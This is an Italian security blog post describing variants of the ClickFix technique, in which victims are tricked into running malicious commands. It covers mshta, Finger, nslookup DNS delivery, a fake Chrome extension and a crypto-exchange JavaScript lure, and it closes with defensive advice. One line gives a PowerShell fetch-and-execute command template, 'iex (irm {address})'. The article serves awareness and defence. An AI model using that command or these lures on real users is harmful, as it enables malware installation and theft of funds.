Variazioni di ClickFix

Circa un anno fa abbiamo pubblicato un post sulla tecnica ClickFix, allora di tendenza. L’essenza degli attacchi ClickFix si riduce al convincere la vittima, con pretesti vari, a eseguire un comando dannoso sul proprio computer. Dal punto di vista delle soluzioni di sicurezza informatica, l’attacco viene eseguito per conto dell’utente attivo e con i relativi privilegi.

Nei primi impieghi di questa tecnica i criminali informatici cercavano di convincere le vittime della necessità di eseguire un comando per correggere qualche problema o superare un captcha e, nella stragrande maggioranza dei casi, il comando dannoso era uno script di PowerShell. Da allora, tuttavia, gli autori degli attacchi hanno escogitato una serie di nuovi trucchi di cui gli utenti dovrebbero essere avvertiti, nonché una serie di nuove varianti di erogazione di payload dannosi che vale la pena tenere d’occhio.

Uso di mshta.exe

L’anno scorso Microsoft ha pubblicato un rapporto sugli attacchi informatici contro gli albergatori che operavano con Booking.com. Gli autori degli attacchi inviavano notifiche false dal servizio oppure e-mail falsamente provenienti da ospiti interessati a una recensione. In entrambi i casi, l’e-mail conteneva un collegamento a un sito Web clone di Booking.com che chiedeva alla vittima di eseguire un codice tramite il menu Esegui per dimostrare di non essere un robot.

Vi sono due differenze fondamentali tra questo attacco e ClickFix. Innanzitutto, qui all’utente non viene chiesto di copiare la stringa (dopotutto, una stringa contenente codice può destare sospetti). La stringa viene invece copiata nel buffer dal sito dannoso, probabilmente quando l’utente fa clic su una casella di controllo che imita il meccanismo reCAPTCHA. In secondo luogo, la stringa dannosa chiama l’utilità legittima mshta.exe, che consente di eseguire applicazioni scritte in HTML. Poi contatta il server degli autori degli attacchi ed esegue il carico utile dannoso.

Video in TikTok e PowerShell con privilegi di amministratore

BleepingComputer ha pubblicato un articolo nell’ottobre 2025 su una campagna che diffondeva malware tramite istruzioni nei video di TikTok. I video stessi erano imitazioni di tutorial su come attivare gratuitamente software proprietario. Le istruzioni si riducevano alla necessità di eseguire PowerShell con diritti di amministratore, quindi di eseguire il comando iex (irm {address}). Qui il comando irm scaricava uno script dannoso da un server controllato da utenti malintenzionati e il comando iex (Invoke-Expression) lo eseguiva. Lo script, a sua volta, scaricava un malware infostealer nel computer della vittima.

Uso del protocollo Finger

Un’altra variante insolita dell’attacco ClickFix sfrutta il noto trucco captcha, ma lo script dannoso usa il protocollo Finger oggi obsoleto. L’omonima utilità consente a chiunque di richiedere dati su un utente specifico su un server remoto. Oggi il protocollo viene utilizzato raramente, ma è ancora supportato da Windows, macOS e diversi sistemi basati su Linux.

L’utente viene convinto ad aprire l’interfaccia della riga di comando per eseguire un comando che stabilisce una connessione al server degli aggressori tramite il protocollo Finger (usando la porta TCP 79). Il protocollo trasferisce solo informazioni testuali, ma è sufficiente per scaricare un altro script nel computer della vittima, che procederà a installare il malware.

Variante CrashFix

Un’altra variante di ClickFix si differenzia per l’utilizzo di tecniche di social engineering più sofisticate. È stata vista in un attacco mirato a utenti in cerca di uno strumento per bloccare banner pubblicitari, tracker, malware e altri contenuti indesiderati nelle pagine Web. Durante la ricerca di un’estensione per Google Chrome, le vittime trovavano un’estensione chiamata NexShield – Advanced Web Guardian, che in realtà era un clone di un software legittimo, ma che a un certo punto arrestava il browser e visualizzava una notifica falsa relativa a un problema di sicurezza e la necessità di eseguire una “scansione” per correggerlo. Se l’utente accettava, riceveva istruzioni su come aprire il menu Esegui ed eseguire un comando che l’estensione aveva precedentemente copiato negli Appunti.

Il comando copiava il familiare file finger.exe in una directory temporanea, lo rinominava ct.exe e quindi lo avviava con l’indirizzo dell’utente malintenzionato. Il resto dell’attacco proseguiva come già descritto sopra. In risposta alla richiesta del protocollo Finger veniva recapitato uno script dannoso che avviava e installava un trojan di accesso remoto (in questo caso ModeloRAT).

Invio di malware tramite DNS lookup

Il team di Microsoft Threat Intelligence ha inoltre condiviso una variante di attacco ClickFix leggermente più complessa del solito. Sfortunatamente, non ha fornito alcuna descrizione della componente di social engineering, ma il metodo per distribuire il carico utile dannoso è piuttosto interessante. Probabilmente per complicare il rilevamento dell’attacco in un ambiente aziendale e prolungare la vita dell’infrastruttura dannosa, gli autori degli attacchi aggiungevano un passaggio: contattare un server DNS controllato da loro stessi.

In altre parole, dopo che la vittima veniva in qualche modo persuasa a copiare ed eseguire un comando dannoso, una richiesta veniva inviata al server DNS per conto dell’utente tramite la legittima utilità nslookup, richiedendo dati per il dominio example.com. Il comando conteneva l’indirizzo di un server DNS specifico controllato dagli autori degli attacchi. Restituiva una risposta che, tra le altre cose, restituiva a sua volta una stringa contenente script dannoso, la quale scaricava il carico utile finale (in questo attacco, di nuovo ModeloRAT).

Esca di criptovaluta e JavaScript come carico utile

La successiva variante di attacco è interessante per il suo modello di social engineering a più stadi. Nei commenti su Pastebin, gli aggressori avevano attivamente diffuso un messaggio in merito a un presunto difetto nell’exchange di criptovalute Swapzone.io. I proprietari di criptovalute venivano invitati a visitare una risorsa creata dai truffatori contenente istruzioni complete su come sfruttare questa falla, capace di generare fino a 13.000 dollari in un paio di giorni.

Le istruzioni spiegavano come sfruttare i difetti del servizio per scambiare criptovalute a tassi più favorevoli. A tale scopo, la vittima doveva aprire il sito Web del servizio nel browser Chrome, digitare “javascript:” nella barra degli indirizzi, quindi incollare lo script JavaScript copiato dal sito Web degli autori degli attacchi ed eseguirlo. In realtà, ovviamente, lo script non incideva in alcun modo sui tassi di cambio ma sostituiva semplicemente gli indirizzi dei wallet Bitcoin e, se la vittima avesse effettivamente tentato di scambiare qualcosa, avrebbe trasferito i fondi sui conti degli autori degli attacchi.

Come proteggere l’azienda dai truffatori

Gli attacchi più semplici che utilizzano la tecnica ClickFix possono essere contrastati inibendo la combinazione di tasti [Win] + [R] sui dispositivi di lavoro. Tuttavia, come si vede dagli esempi elencati, non rappreseno affatto l’unico tipo di attacco in cui agli utenti viene richiesto di eseguire essi stessi codice dannoso.

Pertanto, il consiglio principale è di sensibilizzare i dipendenti alla sicurezza informatica. Devono capire chiaramente che se qualcuno chiede loro di eseguire manipolazioni insolite al sistema e/o di copiare codice e incollarlo da qualche parte, nella maggior parte dei casi si tratta di un trucco. La formazione sulla sensibilizzazione alla sicurezza può essere organizzata con Kaspersky Automated Security Awareness Platform.

Inoltre, per proteggersi da tali attacchi informatici, è consigliabile:

• Usare una protezione affidabile su tutti i dispositivi aziendali.
• Monitorare le attività sospette nella rete aziendale utilizzando una soluzione XDR.
• Se le risorse interne sono insufficienti, usare un servizio esterno per rilevare le minacce e rispondere prontamente.